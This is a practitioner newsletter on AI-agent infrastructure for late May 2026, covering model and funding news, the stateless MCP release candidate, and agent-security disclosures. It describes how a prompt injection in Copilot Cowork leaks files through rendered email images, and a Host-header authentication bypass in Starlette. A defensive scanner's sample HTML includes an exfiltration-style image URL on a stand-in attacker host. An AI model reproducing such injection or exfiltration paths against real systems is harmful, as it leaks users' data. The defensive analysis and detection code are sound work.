Artificer’s Grimoire — Edition 14 · May 31, 2026

The week belonged to Anthropic — a $65B Series H at a $965B post-money valuation, Claude Opus 4.8, and a Dynamic Workflows research preview that runs hundreds of parallel subagents in one session, all inside five days, capped by a detailed writeup of how the company contains its own agents across products. But the load-bearing infrastructure story is one level down: the Model Context Protocol published a 2026-07-28 release candidate that removes protocol-level sessions and the initialize handshake, makes MCP stateless, and deprecates Roots, Sampling, and Logging — the biggest shape change to the protocol since it launched. Running parallel to both were two agent-security disclosures: Microsoft Copilot Cowork’s rendered-image data leak and “BadHost,” a critical authentication-bypass flaw in Starlette, a framework with roughly 325 million weekly downloads. Add Cognition’s $1B Series D for the async-agent thesis, and the platform layer, the protocol layer, and the threat layer all moved in the same week.

Must Read

Claude Opus 4.8 + Dynamic Workflows land the same day as a $65B Series H

Sources: Anthropic — Introducing Claude Opus 4.8 · 2026-05-28 · Anthropic — Series H · 2026-05-28 · Claude Code Docs — Workflows · TechCrunch — Anthropic releases Opus 4.8 with new ‘dynamic workflow’ tool · 2026-05-28 · MarkTechPost — Anthropic Ships Claude Opus 4.8 Alongside Dynamic Workflows and Cheaper Fast Mode, With Workflows Capped at 1,000 Subagents · 2026-05-28 · Latent Space — Anthropic raises $965B Series H, releases Opus 4.8 and Dynamic Workflows/ultracode · 2026-05-29 · Simon Willison — Claude Opus 4.8: “a modest but tangible improvement” · 2026-05-28 Score: 5 · Tags: anthropic, opus-4-8, dynamic-workflows, subagents, agent-orchestration, funding

Anthropic shipped a model and a funding round on the same day. Claude Opus 4.8 lands 41 days after 4.7 at unchanged regular pricing ($5/$25 per million input/output tokens), with fast-mode pricing cut to $10/$50 from the prior $30/$150. Anthropic’s own framing emphasises code honesty: the model is, per its post, “around four times less likely than its predecessor to allow flaws in code it has written to pass unremarked.” The launch feature is Dynamic Workflows (research preview, Enterprise/Team/Max), which lets Claude “plan the work and then run hundreds of parallel subagents in a single session” for codebase-scale migrations across hundreds of thousands of lines; trade-press coverage (TechCrunch, MarkTechPost) reports the workflows are capped at 1,000 subagents. Anthropic’s Claude Code documentation pairs this with an ultracode setting (/effort ultracode) that combines xhigh reasoning effort with automatic workflow orchestration: with it on, Claude plans a workflow for each substantive task rather than waiting to be asked, and a single request can spawn several workflows in sequence — one to understand the code, one to make the change, one to verify it. It’s session-scoped (drop back with /effort high) and offered only on models that support xhigh effort. Separately, the Series H raised $65B at a $965B post-money valuation, and the announcement disclosed that run-rate revenue “crossed $47 billion earlier this month.” Simon Willison’s read on the model itself: “a modest but tangible improvement.”
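To make the fast-mode cut concrete, here is a back-of-envelope calculation that uses only the per-million-token prices quoted above. The workload size (2M input tokens, 0.5M output tokens) is an illustrative assumption, not a figure from Anthropic.

```python
# Prices in USD per million tokens as (input, output), taken from the text above.
REGULAR = (5.0, 25.0)
FAST_OLD = (30.0, 150.0)
FAST_NEW = (10.0, 50.0)


def cost_usd(prices, input_tokens, output_tokens):
    """Cost of a workload at the given per-million-token prices."""
    in_price, out_price = prices
    return (input_tokens * in_price + output_tokens * out_price) / 1_000_000


# Hypothetical workload: 2M input tokens and 0.5M output tokens.
workload = (2_000_000, 500_000)
regular = cost_usd(REGULAR, *workload)
fast_old = cost_usd(FAST_OLD, *workload)
fast_new = cost_usd(FAST_NEW, *workload)

print(f"regular ${regular:.2f}, fast (old) ${fast_old:.2f}, fast (new) ${fast_new:.2f}")
```

Because input and output prices scale by the same factor, the fast-mode premium over regular pricing drops from 6x to 2x regardless of the token mix.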

Why it matters: The interesting thing isn’t the model bump — Willison’s “modest but tangible” is the right register, and a 41-day cadence makes any single point release less of an event. It’s that Dynamic Workflows is Anthropic shipping the multi-agent orchestration pattern as a first-party product primitive, not a framework you assemble yourself. The Grimoire has tracked subagent fan-out as a harness-engineering pattern for months; “plan, then run hundreds of subagents in one session, capped at 1,000” is that pattern with a vendor SLA and a billing model attached. Two practitioner implications. First, the build-vs-buy line for orchestration moves the same way the runtime line moved in Editions 11–13 — if your team has been hand-rolling a planner-plus-worker-pool on top of the Agent SDK, the managed version now exists and the differentiation shifts to how you decompose work, not how you schedule it. Second, the fan-out-to-hundreds pitch collides directly with the orchestration-tax reality Osmani named (and Edition 13 covered): spawning 1,000 subagents is cheap, but the human judgement to merge their output still routes through one serial reviewer. The cap is a scheduling number; the bottleneck is attention, and that doesn’t parallelise. The $47B run-rate and $965B valuation are the capital backdrop that makes shipping a model, an orchestration product, and a price cut in one day economically routine for a frontier lab — which is itself the story.
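A toy model of that bottleneck, under loudly stated assumptions: every subagent takes the same wall-clock time, subagents beyond the pool size wait for the next wave, and a single human reviews outputs one at a time. The function name and all numbers are hypothetical and chosen only for illustration.

```python
import math


def wall_clock_minutes(n_subagents, pool_size, agent_minutes, review_minutes):
    """Return (agent_time, review_time) in minutes for a toy fan-out.

    Agent work runs in parallel waves of `pool_size`; review is strictly serial.
    """
    waves = math.ceil(n_subagents / pool_size)
    agent_time = waves * agent_minutes
    review_time = n_subagents * review_minutes
    return agent_time, review_time


# 1,000 subagents, all running at once, 10 minutes each, 3 minutes of review each.
agent_time, review_time = wall_clock_minutes(1000, 1000, 10, 3)
print(f"agents: {agent_time} min, review: {review_time} min")
```

In this model the agent side finishes in 10 minutes while serial review takes 3,000 minutes (50 hours). Shrinking the pool changes the first number only; the second depends on how much output a reviewer has to read.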

MCP goes stateless — the 2026-07-28 RC is the biggest protocol reshape since launch

Sources: modelcontextprotocol/specification — MCP 2026-07-28 RC · 2026-05-29 · MCP draft changelog Score: 5 · Tags: mcp, protocol, stateless, transport, deprecation, agentic-protocols

The Model Context Protocol published its 2026-07-28 release candidate, and the changelog (measured against the prior 2025-11-25 revision) is a structural reshape rather than a feature drop. The headline moves: remove protocol-level sessions and the Mcp-Session-Id header from the Streamable HTTP transport (SEP-2567); make MCP stateless by removing the initialize/notifications/initialized handshake, so every request now carries its protocol version, client identity, and capabilities in _meta (SEP-2575); add a mandatory server/discover RPC for up-front version and capability negotiation; replace the HTTP GET endpoint and resources/subscribe/unsubscribe with a single long-lived subscriptions/listen stream; and introduce a Multi Round-Trip Requests (MRTR) pattern that replaces server-initiated requests like roots/list, sampling/createMessage, and elicitation/create with an inputRequests/inputResponses exchange (SEP-2322). On the deprecation side, Roots, Sampling, and Logging are now deprecated (SEP-2577), as is the older HTTP+SSE transport, under a newly adopted feature-lifecycle policy with a minimum twelve-month deprecation window. The RC is explicitly not final — changes may land before release — but SDKs will begin adopting it.
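A minimal sketch of what "every request carries its own context" could look like on the wire. The JSON-RPC 2.0 envelope is standard; the key names inside _meta, the error code choice, and both function names are assumptions made for illustration and should be checked against the RC's actual schema.

```python
def build_request(request_id, method, params, protocol_version, client_info, capabilities):
    """Build a self-describing JSON-RPC 2.0 request.

    The key names under "_meta" are placeholders, not the RC's confirmed schema.
    """
    meta = {
        "protocolVersion": protocol_version,  # hypothetical key name
        "clientInfo": client_info,            # hypothetical key name
        "capabilities": capabilities,         # hypothetical key name
    }
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": method,
        "params": {**params, "_meta": meta},
    }


def handle(request, supported_versions=("2026-07-28",)):
    """Stateless handler: no session lookup, everything is read from the request."""
    meta = request["params"]["_meta"]
    if meta["protocolVersion"] not in supported_versions:
        # -32600 (Invalid Request) is an illustrative choice of error code.
        return {
            "jsonrpc": "2.0",
            "id": request["id"],
            "error": {"code": -32600, "message": "unsupported protocol version"},
        }
    return {"jsonrpc": "2.0", "id": request["id"], "result": {"ok": True}}


request = build_request(
    1, "tools/list", {}, "2026-07-28", {"name": "demo-client", "version": "0.1"}, {}
)
response = handle(request)
```

The point of the shape is that handle depends only on its argument, so any replica behind a load balancer can answer any request.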

Why it matters: This is the protocol catching up to how MCP is actually deployed at scale. Protocol-level sessions and a stateful handshake are awkward for serverless and horizontally-scaled MCP servers — every connection carrying its own session state is exactly the thing that breaks behind a load balancer. Making the protocol stateless (identity and capabilities in _meta on every request, explicit server-minted handles when cross-call state is genuinely needed) is the change that lets MCP servers scale like ordinary stateless HTTP services. For practitioners, three things land. First, if you operate MCP servers, this is a migration with a real surface: the initialize handshake going away and server/discover becoming mandatory means SDK upgrades will be load-bearing, not cosmetic. Second, the deprecation of Sampling and Roots ratifies what enterprise gateways already did in practice — most teams pass context via tool parameters and call LLM provider APIs directly rather than routing sampling back through the client; the spec now points the same direction. Third, the minor-but-telling additions — deterministic tools/list ordering and a CacheableResult interface with ttlMs/cacheScope — are prompt-cache and polling-cost optimisations baked into the protocol, the same token-economics discipline GitHub demonstrated this week (see Worth Scanning). The twelve-month deprecation window is the practitioner’s planning runway; the migration map is the scout this deserves.
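As a rough illustration of the polling-cost angle, a client could honour a ttlMs hint with a small cache like the one below. This is a sketch under assumptions: it supposes ttlMs sits at the top level of a result object, it ignores cacheScope entirely, and the class name is hypothetical rather than part of any MCP SDK.

```python
import time


class TtlCache:
    """Tiny client-side cache keyed by method name, honouring a ttlMs hint."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock   # injectable so expiry can be tested without sleeping
        self._entries = {}    # key -> (expires_at_seconds, result)

    def get(self, key):
        entry = self._entries.get(key)
        if entry is None or self._clock() >= entry[0]:
            return None
        return entry[1]

    def put(self, key, result):
        ttl_ms = result.get("ttlMs")  # assumed location of the hint
        if ttl_ms:
            self._entries[key] = (self._clock() + ttl_ms / 1000, result)


# Usage with a fake clock: the entry is served until the TTL elapses.
now = [0.0]
cache = TtlCache(clock=lambda: now[0])
cache.put("tools/list", {"tools": [], "ttlMs": 5000})
fresh = cache.get("tools/list")
now[0] = 5.0
stale = cache.get("tools/list")
```

Results without a ttlMs value are never stored, so a server that does not opt in is always re-queried.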

The hard part is still keeping data in the box — Copilot Cowork, BadHost in Starlette, and Anthropic’s containment doc

Sources: Simon Willison — Microsoft Copilot Cowork Exfiltrates Files · 2026-05-26 · Ars Technica — Millions of AI agents imperiled by critical vulnerability in open source package · 2026-05-26 · OSTIF — Disclosing the BadHost vulnerability in Starlette (CVE-2026-48710) · Anthropic — How we contain Claude across products · 2026-05-30 · Simon Willison — How we contain Claude across products · 2026-05-30 Score: 5 · Tags: data-exfiltration, prompt-injection, sandboxing, supply-chain, starlette, agent-containment

Three security stories in one week, all circling the same problem: keeping attackers away from the data and credentials inside agentic systems. Microsoft Copilot Cowork was found to allow agents to send emails to the user’s own inbox without approval; those messages could embed external images whose network requests exfiltrate data when the message is rendered, and OneDrive’s pre-authenticated download links gave a successful prompt injection a path to leak file contents. Willison’s framing: “The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data.” “BadHost” (CVE-2026-48710) is a critical authentication-bypass flaw disclosed in Starlette — the ASGI framework beneath FastAPI and a large share of Python MCP-server and agent stacks. Reporting describes an attacker injecting path components into the HTTP Host header to slip past auth checks and reach protected endpoints, with credential theft as the downstream risk. Per Ars Technica, Starlette draws roughly 325 million weekly downloads, so the blast radius runs through a great deal of agent infrastructure. And Anthropic published “How we contain Claude across products,” a detailed overview of its sandbox techniques across Claude.ai, Claude Code, and Cowork: “We constrain where and how an agent can act with process sandboxes, VMs, filesystem boundaries, and egress controls. The goal is to set a hard boundary on what an agent can reach.” The load-bearing principle, in Anthropic’s words: “if credentials never enter the sandbox, they can’t be exfiltrated, regardless of whether the cause is a user, a model finding a ‘creative’ path.” Willison — a frequent critic of under-documented sandboxes — calls it “a fantastic overview.”
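Independent of the specific CVE, a service can refuse to act on Host values that do not look like a plain hostname. The check below is a generic defence-in-depth sketch, not a reproduction of BadHost and not Starlette's fix (upgrading remains the actual remedy); the function name and allowlist are hypothetical.

```python
import re

# Hostname with an optional numeric port. Slashes, spaces, userinfo and
# IPv6 literals are all rejected outright in this sketch.
_HOST_SHAPE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}(?::[0-9]{1,5})?")


def is_acceptable_host(host_header, allowed_hosts):
    """True only if the header has a plain host[:port] shape and is allowlisted."""
    if not _HOST_SHAPE.fullmatch(host_header):
        return False
    hostname = host_header.split(":", 1)[0].lower()
    return hostname in allowed_hosts


ALLOWED = {"api.example.com"}  # hypothetical allowlist
checks = {
    "api.example.com": is_acceptable_host("api.example.com", ALLOWED),
    "api.example.com:8443": is_acceptable_host("api.example.com:8443", ALLOWED),
    "api.example.com/admin": is_acceptable_host("api.example.com/admin", ALLOWED),
    "evil.example.net": is_acceptable_host("evil.example.net", ALLOWED),
}
```

Rejecting on shape first means a value with injected path components never reaches the allowlist comparison or any downstream routing logic.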

Why it matters: Put the three side by side and you get the whole shape of the problem. Copilot Cowork is the live failure: a shipping agent product with an exfiltration path through the most mundane primitive imaginable — an email with an image in it. BadHost is the substrate failure: the framework layer under MCP servers gets a critical CVE, and patch triage reaches well beyond the teams that chose Starlette explicitly, because at 325M weekly downloads many teams may depend on it indirectly (through FastAPI, for instance). Anthropic’s containment doc is the constructive answer, and it’s worth reading as a design spec rather than marketing: the “credentials never enter the sandbox” principle is the single most useful framing for teams designing their own agent boundaries, because it converts an unwinnable game (predict every creative exfiltration path a model might find) into a winnable one (ensure the thing worth stealing was never reachable). For practitioners, the action items are concrete: audit whether your agent products can emit outbound network requests through rendered content (the Cowork vector), put Starlette/FastAPI on this week’s patch list and check your MCP-server base images, and use Anthropic’s containment writeup as a checklist against your own harness — process sandbox, VM boundary, filesystem scope, egress control, and credential isolation as five separate questions, not one. The exfiltration problem is not getting easier; it’s getting better documented, which is the next best thing.
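One way to start the rendered-content audit is to scan HTML an agent can emit for image URLs that point off an allowlist. The sketch below uses only Python's standard library; the class name, allowlist, and sample hosts are hypothetical, and it covers only img src attributes, not CSS backgrounds, links, or other markup that triggers a fetch.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ExternalImageFinder(HTMLParser):
    """Collect <img> sources whose host is not on the allowlist."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {host.lower() for host in allowed_hosts}
        self.external = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        src = dict(attrs).get("src") or ""
        host = (urlparse(src).hostname or "").lower()
        # Relative paths and cid: references have no host and are skipped.
        if host and host not in self.allowed_hosts:
            self.external.append(src)


def external_images(html, allowed_hosts=()):
    finder = ExternalImageFinder(allowed_hosts)
    finder.feed(html)
    return finder.external


sample = (
    '<p>Weekly summary</p>'
    '<img src="https://evil.example/p.png?d=secret">'
    '<img src="cid:logo">'
    '<img src="https://cdn.example.com/a.png">'
)
flagged = external_images(sample, allowed_hosts={"cdn.example.com"})
```

A non-empty result means rendering the message would issue a request to a host you did not approve, which is the channel the Cowork report describes.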

Cognition raises $1B for the async-agent thesis

Sources: Latent Space — Cognition raises $1B in $26B Series D · 2026-05-28 · Latent Space — The Age of Async Agents (Cognition’s Walden Yan & OpenInspect’s Cole Murray) · 2026-05-28 Score: 4 · Tags: cognition, devin, async-agents, spec-to-pr, autonomous-coding-agents, funding

Latent Space reports that Cognition, the company behind Devin, raised a $1B Series D at a $26B valuation. The companion Latent Space conversation with Cognition’s Walden Yan and OpenInspect’s Cole Murray frames the pitch as “the Age of Async Agents”: full-VM execution, spec-to-PR workflows, agent memory, and a headline figure that roughly 80% of Devin’s commits are now agent-authored. Latent Space’s gloss on the market logic is blunt: “coding is an uncapped TAM market.”

Why it matters: Cognition raising at $26B is the competitive-landscape datapoint, but the async-agent framing is the practitioner-relevant part, and it’s a genuine fork from the Anthropic/Google direction. Dynamic Workflows and ultracode are about doing more within a session — fan out, parallelise, finish the task while the human watches. The async thesis is about the human not watching: the agent runs in a full VM against a spec, opens a PR, and the human’s first contact is review. Both are real patterns, and they have different failure modes — the synchronous-swarm model hits the orchestration tax (attention doesn’t parallelise), the async model hits the merge-and-review-trust problem (the 20,574-session study in Papers is the empirical read on exactly this: most agent failures impose trust and effort costs, and ~91% of visible resolutions still need explicit user correction). For teams choosing an operating model, the question Cognition’s raise sharpens is whether your workflow is “agent as fast pair” or “agent as async contributor whose PRs you review” — they want different harnesses, different review discipline, and different memory architectures.

Google folds Gemini CLI into Antigravity CLI — free users migrate by June 18

Sources: Google Developers Blog — An important update: Transitioning Gemini CLI to Antigravity CLI · 2026-05 Score: 4 · Tags: google, antigravity-cli, gemini-cli, coding-agents, deprecation, multi-agent

Google is transitioning the community-focused Gemini CLI into Antigravity CLI, a Go-based, agent-first command-line platform built for multi-agent workflows with asynchronous processing and a unified architecture that syncs with the Antigravity 2.0 desktop app (which Edition 13 covered at I/O). Enterprise customers retain existing access, but individual and free users must migrate before Gemini CLI stops serving requests on June 18, 2026.

Why it matters: This is the CLI consolidation that completes the Antigravity repositioning. Gemini CLI was the open, community-facing terminal tool; Antigravity CLI is the agent-platform-aligned successor, and the rewrite to Go plus async processing signals Google treating the terminal as a first-class agent surface rather than a chat wrapper. For practitioners, the immediate detail is the hard cutoff: June 18 is a deprecation date, not a soft nudge, and any pipeline, script, or CI step shelling out to gemini needs a migration plan before then. The broader signal is that major vendors appear to be clustering around the same surface area — Anthropic’s Claude Code, OpenAI’s Codex CLI, and now Antigravity CLI are all agent-first terminal tools backed by a desktop/platform counterpart, and the differentiation is increasingly the orchestration model (Antigravity’s async/multi-agent framing) rather than the model behind it.
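A quick inventory of where gemini is invoked is a reasonable first step toward that migration plan. The sketch below is a plain text search, so expect false positives; the file suffix list and function names are assumptions, and it matches lowercase gemini as a whole word (including gemini-cli) rather than parsing shell syntax.

```python
import re
from pathlib import Path

GEMINI_WORD = re.compile(r"\bgemini\b")


def gemini_lines(text):
    """Return (line_number, stripped_line) pairs that mention `gemini` as a word."""
    return [
        (lineno, line.strip())
        for lineno, line in enumerate(text.splitlines(), start=1)
        if GEMINI_WORD.search(line)
    ]


def scan_tree(root, suffixes=(".sh", ".yml", ".yaml", ".py", ".mk")):
    """Walk `root` and collect hits per file; the suffix list is an assumption."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix in suffixes:
            found = gemini_lines(path.read_text(errors="ignore"))
            if found:
                hits[str(path)] = found
    return hits


example = "echo start\ngemini -p 'summarise'\nmy_gemini_helper\nrun: npx gemini-cli\n"
example_hits = gemini_lines(example)
```

Running scan_tree(".") from a repository root gives a per-file list to triage before the cutoff.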

The methodology layer hardens — VibeSec Reckoning, regression sensors, and a 20,574-session failure study

Sources: Martin Fowler / Thoughtworks — The VibeSec Reckoning · 2026-05-27 · Martin Fowler / Birgitta Böckeler — The test suite as a regression sensor · 2026-05-27 · arXiv — How Coding Agents Fail Their Users: 20,574 Real-World Sessions Score: 4 · Tags: vibe-coding, security, regression-sensors, failure-modes, methodology, harness-engineering

The coding-agent methodology literature added three substantive pieces this week. In “The VibeSec Reckoning,” Gautam Koul, Lucian Moss, Neil Drew-Lopez, and Daberechi Ruth Edeokoh document building Thoughtworks marketing applications with AI agents that frequently recommended insecure configurations, along with their countermeasures: write a security-context file to guide the AI, be cautious with AI permission requests, maintain a daily security-intelligence feed, and give builders a secure-by-default harness and templates. Böckeler’s latest sensors installment frames the test suite itself as a regression sensor: instrumentation the harness uses to catch the regressions agentic coding introduces. And the empirical anchor: “How Coding Agents Fail Their Users,” a study of 20,574 real-world sessions across 1,639 repositories that names seven recurring forms of developer-agent misalignment. Its headline finding, verbatim: “90.50% of episodes impose effort and trust costs rather than irreversible system damage, yet 91.49% of visible resolutions still require explicit user correction.”
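One simple reading of "test suite as regression sensor" is a before/after comparison of test outcomes around an agent's change. The sketch below is that reading only, not Böckeler's implementation; the function name and the outcome strings are assumptions, and in practice the two mappings would come from your test runner's report.

```python
def regressions(before, after):
    """Tests that passed before the change and do not pass after it.

    `before` and `after` map test IDs to outcome strings such as "passed"
    or "failed". A test that disappeared counts as a regression, since
    deleting a failing test is one way a change can make a suite look green.
    """
    return sorted(
        test_id
        for test_id, outcome in before.items()
        if outcome == "passed" and after.get(test_id) != "passed"
    )


before_run = {"test_login": "passed", "test_export": "passed",
              "test_legacy": "failed", "test_quota": "passed"}
after_run = {"test_login": "passed", "test_export": "failed",
             "test_legacy": "failed"}
signal = regressions(before_run, after_run)
```

Here the sensor reports test_export (now failing) and test_quota (removed), while test_legacy is ignored because it was already failing before the change.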

Why it matters: Edition 13 caught the methodology wave forming (Fowler’s Bliki, Böckeler’s first sensors, Osmani’s orchestration tax). This week it gets sharper and more operational. The VibeSec piece is the security counterpart to the maintainability sensors — same Thoughtworks instinct (don’t trust the agent’s defaults, instrument the harness to catch what it gets wrong), applied to the configuration-security failure mode that vibe coding reliably produces. The “secure-by-default harness and templates” recommendation is the load-bearing one: it moves security left of the agent, into the scaffolding the agent operates inside, which is exactly where the containment-doc thinking from this week’s security cluster points. The 20,574-session study is the dataset the whole methodology conversation needed — the reassuring read is that most agent failures are recoverable (effort and trust costs, not irreversible damage), but the sobering one is that ~91% of resolutions still need a human to step in, which is the empirical shape of the orchestration tax and the strongest available argument against “set it and forget it” autonomy. Together: agents fail in characterisable ways, the harness can sense some of those failures, and the human-correction rate stays stubbornly high. That’s the curriculum for anyone operating these workflows in production.

Worth Scanning

GitHub Slashes Agent Workflow Token Spend up to 62% with Daily Audits and MCP Pruning (InfoQ, 2026-05-29) — GitHub reports cutting agentic-CI token costs up to 62% by pruning unused MCP tools, swapping some MCP calls for the gh CLI, and running daily “auditor” and “optimizer” agents; a token-usage.jsonl artifact and an “Effective Tokens” metric track spend and catch regressions. First-party, directly actionable.
Cloudflare Adds Support for Claude Managed Agents (InfoQ, 2026-05-28) — Run and manage Claude Managed Agents on Cloudflare, connecting to private systems with a choice of runtime and Cloudflare-native monitoring; extends the six-layer platform Edition 13 covered.
Azure Logic Apps Adds Sandboxed Code Interpreters to Agent Workflows (InfoQ, 2026-05-27) — Microsoft’s take on safe code execution inside orchestrated agents; pairs with the containment thread.
Arm Open-Sources Metis, an AI Security Framework Outperforming Traditional SAST (InfoQ, 2026-05-30) — Agentic code-scanning framework Arm reports beats traditional SAST; lands the same week as Microsoft’s MDASH large-scale AI vulnerability research.
Microsoft Introduces MDASH for Large-Scale AI Vulnerability Research (InfoQ, 2026-05-25) — Microsoft’s framework for AI-driven vulnerability discovery at scale; the agents-applied-to-security trend continues across vendors.
Inside a 176-Package npm Campaign Built to Beat Your Internal Dependencies (Sonatype, 2026-05-28) — Dependency-confusion campaign engineered against internal packages; fresh input for the agent-substrate-attack-surface thread.
Exploit Code Published for Critical Flowise RCE Vulnerability (SecurityWeek, 2026-05-30) — Public exploit for an RCE in the Flowise low-code LLM/agent builder; more than generic CVE noise for this audience given Flowise’s place in the agent-builder ecosystem.
Build Long-running AI Agents That Pause, Resume, and Never Lose Context with ADK (Google, 2026-05) — Durable pause/resume arrives in Google’s ADK; the durable-execution pattern (cf. Step Functions, Temporal) in the Google agent stack. ADK for Kotlin/Android 0.1.0 also shipped.
Anthropic’s run-rate revenue hits $47 billion (Simon Willison, 2026-05-29) — Willison unpacks the Series H run-rate figure (an annualised projection from the most recent month) and Anthropic’s habit of disclosing it inside funding announcements; useful caveat for reading the headline number.
A2A Protocol v1.0.1 (a2aproject, 2026-05-28) — Patch release on the agent-to-agent protocol post-1.0.
GitHub Spec Kit 0.8.14 → 0.8.18 (github/spec-kit, 2026-05-26 → 05-29) — Five point releases in the window; rapid-iteration signal on the SDD tooling front.
Notes on Pope Leo XIV’s encyclical on AI (Simon Willison, 2026-05-25) — The papal AI encyclical “Magnifica humanitas” drew commentary from Anthropic co-founder Chris Olah and a detailed read from Willison; governance/policy beat.

New Tools & Repos

Antigravity CLI — Go · Google’s agent-first terminal successor to Gemini CLI, built for async multi-agent workflows and synced with Antigravity 2.0.
Arm Metis — Open-source agentic AI security framework Arm reports outperforms traditional SAST tooling.
datasette-agent 0.1a4 — Python · Simon Willison’s constrained agent harness over Datasette + SQLite (alongside datasette 1.0a30/1.0a31 and llm-anthropic 0.25.1).
markdown-svg-renderer — Utility for rendering markdown to SVG; small but characteristic Willison tool release.
LangGraph 1.2.2 + SDK 0.4.0 + CLI 0.4.27 — Core patch plus a minor SDK bump that may carry interface changes worth a scan.
CrewAI 1.14.6 — Stable patch release (1.14.6a2 preview also shipped).

Papers

How Coding Agents Fail Their Users: A Large-Scale Analysis of Developer-Agent Misalignment in 20,574 Real-World Sessions — Ningzhi Tang, Chaoran Chen, Gelei Xu, Yiyu Shi, Yu Huang, Collin McMillan, Tao Dong, Toby Jia-Jun Li — Names seven forms of developer-agent misalignment across 20,574 sessions from 1,639 repositories; reports most failures impose effort/trust costs rather than irreversible damage, but ~91% of visible resolutions still need explicit user correction.
Guardrails Beat Guidance: A Large-Scale Study of Rules, Skills, and Persistent Configuration for Coding Agents — Large-scale comparison arguing hard guardrails outperform soft guidance for steering coding agents; directly relevant to the AGENTS.md/skills/persistent-config debates.
Coherence Collapse: Diagnosing Why Code Agents Fail After Reaching the Right Code — Characterises a failure mode where agents reach a correct solution and then degrade it; part of this week’s coding-agent-failure cluster.
SpecBench: Evaluating Specification-Level Reasoning for Software Engineering LLM Agents — A benchmark for specification-level reasoning in SE agents; empirical grounding for the SDD thesis (pairs with Verus-SpecGym, 2605.26457).
Contractual Skills: A GovernSpec Design Framework for Enterprise AI Agents — A governance-spec framework for enterprise agent skills, intersecting the skills ecosystem with agent governance.
Security, Privacy, and Ethical Risks in OpenClaw — Risk analysis of the open-source OpenClaw coding-agent harness; primary input for the harness-attack-surface and disclosure-cadence threads.
The Best-Laid SCHEMEs: Coordinated Sabotage and Monitoring in Multi-Agent Systems — One of a multi-agent-security cluster this week alongside “Got a Secret? LLM Agents Can’t Keep It” (privacy leakage) and “IterInject” (indirect prompt injection); collectively a maturing research front on adversarial multi-agent behaviour.

Ecosystem Watch

Anthropic Series H (Anthropic, 2026-05-28) — $65B raised at a $965B post-money valuation; run-rate revenue disclosed as having “crossed $47 billion earlier this month.”
Claude Opus 4.8 + Dynamic Workflows (Anthropic, 2026-05-28) — New flagship at unchanged $5/$25 pricing with fast mode cut to $10/$50; Dynamic Workflows research preview runs up to 1,000 subagents per session (cap per trade press).
Cognition raises $1B Series D at a $26B valuation (Cognition, via Latent Space 2026-05-28) — Capital for the async-agent thesis; Devin’s commits reported ~80% agent-authored.
Google transitions Gemini CLI to Antigravity CLI (Google, 2026-05) — Go-based agent-first CLI; Gemini CLI stops serving free/individual users June 18, 2026.
Cloudflare adds Claude Managed Agents support (Cloudflare, via InfoQ 2026-05-28) — Run/manage Claude Managed Agents on Cloudflare with private-system connectivity and native monitoring.
Geordie raises $30M for AI security and governance (Geordie, via SecurityWeek 2026-05-28) — Another AI-governance funding round in the agent-security adjacency.
MokN raises $15M for phish-back platform (MokN, via SecurityWeek 2026-05-29) — Security-tooling round worth noting alongside the broader agentic-security funding flow.

The Long View

There’s a tidy story to tell about this week — Anthropic at a $965B valuation and $47B run-rate, shipping a model, an orchestration product, and a price cut in a single day — and the tidy story is mostly true. But the more durable signal is one level down, in two changes that don’t make headlines: MCP going stateless, and Anthropic publishing how it contains its own agents. Both are infrastructure maturing in public.

The MCP statelessness move is the protocol admitting how it’s actually deployed. Sessions and a stateful handshake are fine for a single long-lived STDIO connection on a developer’s laptop; they’re friction for an MCP server running behind a load balancer serving thousands of agents. Pushing identity and capabilities into per-request metadata, minting explicit handles only when cross-call state is genuinely needed, deprecating Sampling and Roots because enterprise gateways already routed around them — this is the unglamorous work of a protocol growing up into production. The twelve-month deprecation window is the tell: MCP now has a feature-lifecycle policy, which means it’s being run like infrastructure people depend on, not an experiment.

Anthropic’s containment doc is the same maturation on the security side. For most of the past year, agent-sandbox security has been a research-and-disclosure cycle — someone finds a creative exfiltration path, the vendor patches, sometimes quietly. Publishing a clear writeup of the boundaries (process sandbox, VM, filesystem scope, egress control, credential isolation) shifts the conversation from “trust us” to “here’s the model, evaluate it.” The “credentials never enter the sandbox” principle is the most transferable idea of the week precisely because it’s not Anthropic-specific — it’s a design rule any team can apply.

The week’s two security disclosures are the reminder of why this maturation matters and how far it has to go. Copilot Cowork leaked through an email image; BadHost bypassed authentication through a framework with 325 million weekly downloads. The platform layer is consolidating, the protocol layer is hardening, frontier-lab capital remains extraordinarily abundant — and the agent can still be talked into emailing your files to a stranger. The infrastructure is maturing, and the threat model is expanding right alongside it. Neither is finished.

The Artificer’s Grimoire — weekly intelligence on harness engineering for agentic systems — a practitioner’s field guide, by Tim Schiller (Artificer Digital).
